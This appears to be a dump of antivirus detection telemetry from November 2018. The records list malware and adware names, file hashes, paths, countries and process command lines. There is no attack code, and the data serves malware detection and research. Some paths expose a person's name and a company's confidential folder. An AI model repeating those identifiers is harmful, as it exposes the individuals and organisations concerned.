  Row(detection=Row(filename='flashupdate (1).exe', filepath='C:\\Users\\X\\Documents\\Downloads\\flashupdate (1).exe', filesize=1536000, name='TR/CoinMiner.CY.#M1.#R1'), hash='53f241e48edce037f68543a11c57cf05e084d97d6dc173ac163fec4d9fd50b02', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='BA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-04T17:36:07Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-071000-06130295', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3e9bed2b\\AVSCAN-20181104-070602-E0B02BAF\\AVSCAN-20181104-071000-06130295', filesize=1952000, name='Adware/Widgi.vqxpa.#M1.#R1'), hash='592b7d066b4a229f997bf6ab2da7137333d44655d716c292bf8a9dfc2f474e57', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T00:09:56Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-200748-45154b8b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_cbd99eb2\\AVSCAN-20181104-200142-1862C1A1\\AVSCAN-20181104-200748-45154B8B', filesize=5260000, name='PUA/EDownloader.Gen7.#M1.#R1'), hash='631f664852d72a68a5192868894555b2d775c2886a2546411e331912b9bbc405', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T13:08:48Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-211259-5750d8f3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_01ccaa19\\AVSCAN-20181104-211126-445B25F6\\AVSCAN-20181104-211259-5750D8F3', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='FI', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T18:17:13Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='silentpatchsa.asi', filepath='C:\\Program Files\\Rockstar Games\\GTA SAN\\SilentPatchSA.asi', filesize=256000, name='HEUR/APC.#M1.#R1'), hash='36706adf4832b5785a472241af4bad550aa715084826a596ca8462755f0cd3a2', metadata=Row(cmdline='-c -n NxTzO_WarninG -h 198.50.206.176 -p 7777', country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Rockstar Games\\GTA SAN\\gta_sa.exe', parentsize=14383616, timestamp='2018-11-04T19:31:24Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-224929-e4259f34', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_cbd99eb2\\AVSCAN-20181104-200344-27575B99\\AVSCAN-20181104-224929-E4259F34', filesize=5260000, name='PUA/EDownloader.Gen7.#M1.#R1'), hash='631f664852d72a68a5192868894555b2d775c2886a2546411e331912b9bbc405', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T15:49:27Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T09:36:54Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='offerswizarddata.dll', filepath='\\\\?\\E:\\PASTOR ELOY GARCIA C\\AppData\\Local\\{22C7451A-E175-48C7-89C2-8BEF85809BDD}\\OffersWizardData.dll', filesize=1792000, name='ADWARE/OffersWizard.1792000.#M1.#R1'), hash='68a5b5b209642b4dc351172859cb0cb7cdc19e6cdcbebc49be2b1209ea99e657', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T17:14:04Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='msiexec64_25bc4a13.exe', filepath='C:\\Users\\X\\Desktop\\RESTORED\\2018-11-04_14-01-20\\msiexec64_25bc4a13.exe', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe420_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe420 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='RU', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=345088, timestamp='2018-11-04T09:09:18Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='pdfplus.exe', filepath='C:\\Program Files\\Nuance\\PDF Viewer Plus\\bin\\PDFPlus.exe', filesize=3840000, name='W32/Virut.Gen.#M0.#R0'), hash='080aaa7c0cd8474ba5e091586e7485550ce444be98bd5c0795039ab27125a01d', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-04T05:36:58Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='outside caller 08-26-2016 17e395c.zip', filepath='Outside Caller 08-26-2016 17e395c.zip', filesize=8000, name='HEUR/Suspar.Gen.#M0.#R0'), hash='22f75846c98f01d3c621aff911fa633dd4dc915fe1106ecdf7bc9cbcc811b4cb', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T16:58:49Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T02:20:12Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0000015a', filepath='C:\\Windows\\Temp\\tmp00000258\\tmp0000015a', filesize=8932000, name='PUA/WinThruster.EL.1.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\ITbrain\\AntiMalware\\ITbrain_AntiMalware_Service.exe', parentsize=5719344, timestamp='2018-11-04T13:58:08Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T19:04:02Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='outside caller 08-26-2016 17e395c.zip', filepath='Outside Caller 08-26-2016 17e395c.zip', filesize=8000, name='HEUR/Suspar.Gen.#M0.#R0'), hash='22f75846c98f01d3c621aff911fa633dd4dc915fe1106ecdf7bc9cbcc811b4cb', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T16:32:34Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='clickjogos - sisters fashion showdown.exe', filepath='D:\\DOWNLOADS\\DOWNLOADS DO ARES\\DOWNLOADS DO CHROME\\ClickJogos - Sisters Fashion Showdown.exe', filesize=2288000, name='PUA/InstallCore.Gen.#M300.#R8158'), hash='333ab1eb7ede9be06ecb04060300d4ecd2e7468269bffe76561235acd9c27d6c', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2868224, timestamp='2018-11-04T21:12:39Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-195055-61378c37', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_e4789539\\AVSCAN-20181104-194328-203F8B01\\AVSCAN-20181104-195055-61378C37', filesize=148000, name='ADWARE/DealPly.Gen4.#M1.#R1'), hash='5f456982046db60202faa8a29d13eb84860f00a648b39919dded52111b130275', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T21:50:58Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='fusion[1].dll', filepath='\\?\\C:\\Users\\X\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\36NIUATH\\Fusion[1].dll', filesize=768000, name='PUA/Fusion.IB.#M1.#R1'), hash='0c129ee14f00a11b1dd41569b567a5985d55f78bd7fca000fc66a5ef9e97d7dc', metadata=Row(cmdline=None, country='GB', os_name='Windows', os_vmajor='6', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T14:42:50Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-173222-a65c4664', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_10135bc4\\AVSCAN-20181104-172847-8E9DA678\\AVSCAN-20181104-173222-A65C4664', filesize=8932000, name='TR/Decep.PCfighter.6547.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='AT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T16:32:25Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-162443-a053bf10', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_5b2539a2\\AVSCAN-20181104-162424-9DA7207E\\AVSCAN-20181104-162443-A053BF10', filesize=64000, name='TR/Agent.micws.#M1.#R1'), hash='604898f36af3c8a3ba421d9bf9b5c4156ac28127357a809aca38611edb5d6db9', metadata=Row(cmdline=None, country='RS', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T15:25:09Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-180025-c7e38309', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_01911de9\\AVSCAN-20181104-174801-3DA6A564\\AVSCAN-20181104-180025-C7E38309', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='9a343455ee9e205d57e5e71800ae5dee8091bb9aa8deae57a139229f5b50e0aa', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T11:00:25Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-215051-38ce21f9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_77e93ea4\\AVSCAN-20181104-214501-F9E185C1\\AVSCAN-20181104-215051-38CE21F9', filesize=64000, name='TR/Siggen.64000.#M1.#R1'), hash='b6818febad1804ad62284091c33fe091df1ac21054495fd682540108b7386041', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T14:50:58Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='15eb155ec27f69585afeb73beb55b6c127ef0dd6', filepath='\\\\?\\c:\\users\\X\\appdata\\local\\temp\\2\\15eb155ec27f69585afeb73beb55b6c127ef0dd6', filesize=640000, name='HEUR/APC.#M1.#R1'), hash='d5dd083b4ef9972c6a3b96bcec59b70b6aa0bfbbf4a2a7179747774dcd73d024', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T13:11:05Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T21:38:15Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='wap.exe', filepath='c:\\program files\\prokaward\\wap.exe', filesize=4096000, name='SPR/Tool.AwardKeylogger.93.#M1.#R1'), hash='9c8d0a43aa95e439cede9b69cacfb3c606381bfd6745111c5cfe73a38af9ae38', metadata=Row(cmdline=None, country='BG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\ProKAward\\rsasws.exe', parentsize=98304, timestamp='2018-11-04T22:00:28Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181105-004559-4d4ea99f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_a107a04c\\AVSCAN-20181105-004514-46BEEC95\\AVSCAN-20181105-004559-4D4EA99F', filesize=8932000, name='TR/Decep.PCfighter.6547.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T23:46:02Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='rdpclip.exe', filepath='\\\\?\\C:\\Windows\\system32\\rdpclip.EXE', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='86598d7bba12a8f6dcc489d412c197db32d2a0c8350845e8aa500807aa8c58ee', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T01:14:50Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='travaux atelier 2 rdc ce louga avril 2017.exe', filepath='G:\\travaux atelier 2 RDC CE Louga avril 2017.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline='rtp', country='SN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\SMADAV\\SMΔRTP.exe', parentsize=1866864, timestamp='2018-11-04T17:13:54Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-090432-6541b887', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_ca757762\\AVSCAN-20181104-084814-A417CACE\\AVSCAN-20181104-090432-6541B887', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='KH', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T02:04:35Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-125537-87b85e12', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_aa2ab393\\AVSCAN-20181104-125413-7D68E77C\\AVSCAN-20181104-125537-87B85E12', filesize=192000, name='HEUR/Macro.Downloader.ZAP.Gen.#M1.#R1'), hash='1bc182f69c54e17136f57733ac8cd0c0d5b723a84de94bdaa717e6d1b87be390', metadata=Row(cmdline=None, country='AR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T15:55:35Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='xtpkgtgmbiq.dll', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\nsf5C34.tmp\\xTPKGtGMbiQ.dll', filesize=1152000, name='Adware/Zdengo.fru.#M1.#R1'), hash='ea813cd4129df283f7ae7bc890fd650fc1d876e20be0e460aba3eac62a93efc0', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-02T22:57:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-152804-4dde720c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_35d0e94c\\AVSCAN-20181102-152606-44558405\\AVSCAN-20181102-152804-4DDE720C', filesize=1844000, name='PUA/InstallCore.#M1.#R1'), hash='fb64a814615ae5ffb85b266b55216ce23011393508e40839329d7e63de11eb19', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-02T17:28:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-211023-c0864b3e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_2eb1b43c\\AVSCAN-20181102-210813-AE62A200\\AVSCAN-20181102-211023-C0864B3E', filesize=892000, name='ADWARE/Spigot.892000.#M1.#R1'), hash='9559dc925a2a572eeeff7b5d42e1aabe49cc80f1b149b4d09d9acd8e801ff827', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-02T20:10:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-095030-c91c21be', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_d15e3e13\\AVSCAN-20181102-094231-829B20AD\\AVSCAN-20181102-095030-C91C21BE', filesize=20000, name='PUA/Linkury.#M1.#R1'), hash='8468c3203db279591d6f3ca70d715214b3a8402c2e75c2b8753a53e0fdbd65a0', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T02:50:26Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='asdlnaserverreal.exe', filepath='C:\\Program Files (x86)\\ASUS\\AI Suite II\\Remote GO!\\AsDLNAServerReal.exe', filesize=740000, name='W32/Sality.AT.#M1.#R1'), hash='9b0e8241995925093843498aa94953de110228fca66decb1a6de62ef7d462a4e', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T01:38:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='setup.exe', filepath='\\\\?\\K:\\برامج\\Fack Folder تشفير\\Setup.EXE', filesize=64000, name='HEUR/Patched.Ren.#M1.#R1'), hash='96df2d3e042ce9df1df860a597477c9d5c4bc91878179a5d53caf2674bed2509', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T12:15:32Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tpmagentservice.dll', filepath='C:\\Windows\\System32\\tpmagentservice.dll', filesize=576000, name='TR/Miner.eevge.#M1.#R1'), hash='f6fbbd041481cca2e5e9fd947cd34e0dc066cb16a26cae3b37465c5a59d3403f', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T05:46:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='150644-freeplay-final-rus-mafia2.exe', filepath='C:\\Documents and Settings\\X\\Local Settings\\Temp\\Rar$DRa0.363\\150644-freeplay-final-rus-mafia2.exe', filesize=17600000, name='HEUR/AGEN.1005068.#M1.#R1'), hash='e505fa50dcf2719cbdded64b50eeb327bec87e8e6b3a30b2a3fffc14971a97d8', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T10:13:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='visualboyadvance.exe', filepath='E:\\c\\Compressed\\VisualBoyAdvance.exe', filesize=2048000, name='W32/Small.L.#M1.#R1'), hash='e53e4338f45df25a8bed599ef90749cff5e310c99a6b057e992a2093383744cb', metadata=Row(cmdline='\\\\\\/factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2871808, timestamp='2018-11-02T22:51:52Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='kibitzing.vir', filepath='\\\\?\\C:\\Program Files (x86)\\kaelin\\kibitzing.VIR', filesize=384000, name='HEUR/AGEN.1029347.#M1.#R1'), hash='da9001338852aa8b26d9c06203e000fcf820196cb77f62c642f9f1e58737b50c', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T17:55:07Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='dobjbwfm.exe', filepath='H:\\RECYCLER\\S-7-3-30-7060407318-4077270242-385720246-4753\\dobjBwFm.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='729789b8def8996d03c0bbc7c93e02c0f941e8deb6a80f1f7b25df808b596c7b', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T10:07:38Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='bnqrcqbk.exe', filepath='H:\\RECYCLER\\S-7-3-30-7060407318-4077270242-385720246-4753\\bnQRCQbK.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='729789b8def8996d03c0bbc7c93e02c0f941e8deb6a80f1f7b25df808b596c7b', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T10:05:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='flt-d4sdlang.exe', filepath='\\?\\C:\\Program Files\\Codemasters\\DiRT Showdown\\flt-d4sdlang.exe', filesize=128000, name='HEUR/APC.#M1.#R1'), hash='9dfba7c99f7bad4fc9b9026a5e9fba685ef4733e97fcd5452b3bbb76b2ebad9d', metadata=Row(cmdline=None, country='DZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T18:41:31Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='firefox.exe', filepath='E:\\Treulieb GmbH und Bildungszentrum\\Vertraulich\\2 altes\\Behindertenförderung\\Firefox.exe', filesize=108000, name='PUA/Outbrowse.Gen.#M300.#R5615'), hash='876ce9a4d711a29f0469c1f9e20d566d8534dff2159291a720e1912ad6b684db', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3932672, timestamp='2018-11-02T08:01:49Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='browserpassworddecryptor.exe', filepath='\\\\?\\C:\\Program Files (x86)\\SecurityXploded\\Browser Password Decryptor\\BrowserPasswordDecryptor.exe', filesize=3200000, name='SPR/XPlode.c88582.#M1.#R1'), hash='c885820946d6cc935a12cafc314c4f71865c096c70dfe3d211fb3536f168e059', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T09:35:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='playzth.exe', filepath='C:\\Program Files (x86)\\PlayZTH\\PlayZTH.exe', filesize=9664000, name='HEUR/AGEN.1027942.#M1.#R1'), hash='9eb401544bfbd608b71acb6d99c2b17edcc27d0bebea3b8149a2b407e6d91af3', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-02T02:20:09Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='transcodedwallpaper.jpg', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='9ace743b057d899bfaef341cbdcfb3ba9213f5a0a188ac0591f73e3f7b4e5c22', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2871808, timestamp='2018-11-02T00:26:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='zminer.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\Rar$EXa6028.34678\\miners\\ccminerAlexis78\\zminer.exe', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline='\\\\\\"C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\cgm_1.5.2.rar\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\WinRAR\\WinRAR.exe', parentsize=2232776, timestamp='2018-11-02T03:12:55Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='alonso.exe', filepath='C:\\Program Files (x86)\\Apprentice\\alonso.exe', filesize=384000, name='HEUR/AGEN.1029347.#M1.#R1'), hash='efbb5dc8bb09c6875770d4b43e51aeb97a5b6ff29d81333e8266736432b4b95a', metadata=Row(cmdline=None, country='ZA', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=44520, timestamp='2018-11-02T00:47:31Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='sbeagentupgrader.exe', filepath='C:\\ProgramData\\VIPRE Business Agent\\Downloads\\SBEAgentUpgrader.exe', filesize=480000, name='TR/Crypt.XPACK.Gen7.#M300.#R604486'), hash='9d474e14281cc8d51b8c02cf81a14415f94770561036fe42db4bf164613d9714', metadata=Row(cmdline=None, country='GD', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files (x86)\\VIPRE Business Agent\\SBAMSvc.exe', parentsize=6787480, timestamp='2018-11-02T08:45:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='setup337.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\z5ou4v4snda\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline='2 3.1541100938.5bdb558a65593', country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files (x86)\\Free\\126561261.exe', parentsize=671232, timestamp='2018-11-02T06:45:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='9fee7253038e0d6406e0e25e8040fdcd992e88c9b3be148990761827d226fdab', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-28\\9FEE7253038E0D6406E0E25E8040FDCD992E88C9B3BE148990761827D226FDAB', filesize=6528000, name='TR/Spy.Agent.nfg.#M1.#R1'), hash='9fee7253038e0d6406e0e25e8040fdcd992e88c9b3be148990761827d226fdab', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T13:20:42Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='setup337.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\0gidh0ehnc5\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline=None, country='KR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\ESTsoft\\ALYac\\AYRTSrv.aye', parentsize=624192, timestamp='2018-11-02T05:08:00Z'), dt=datetime.date(2018, 11, 2)),
